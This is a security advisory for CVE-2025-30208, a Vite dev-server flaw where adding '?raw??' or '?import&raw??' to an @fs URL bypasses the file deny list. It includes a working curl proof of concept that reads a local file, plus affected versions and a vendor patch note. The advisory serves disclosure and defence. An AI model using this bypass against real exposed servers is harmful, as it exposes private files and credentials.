
CVE-2025-30208

Vite bypasses server.fs.deny when using ?raw??

### Summary

The contents of arbitrary files can be returned to the browser.

### Impact

Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.

### Details

`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.

### PoC

```bash
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

403 Restricted

The request url "/tmp/secret.txt" is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

### Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

### Vulnerability Details

| Field | Value |
| --- | --- |
| Score | 5.2 |
| Score Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N |
| Affected Versions | vite >= 6.2.0 < 6.2.3; vite >= 6.1.0 < 6.1.2; vite >= 6.0.0 < 6.0.12; vite >= 5.0.0 < 5.4.15; vite < 4.5.10 |
| Severity | Medium |
| Ecosystem | JavaScript |
| Publish Date | March 25, 2025 |
| Modified Date | March 25, 2025 |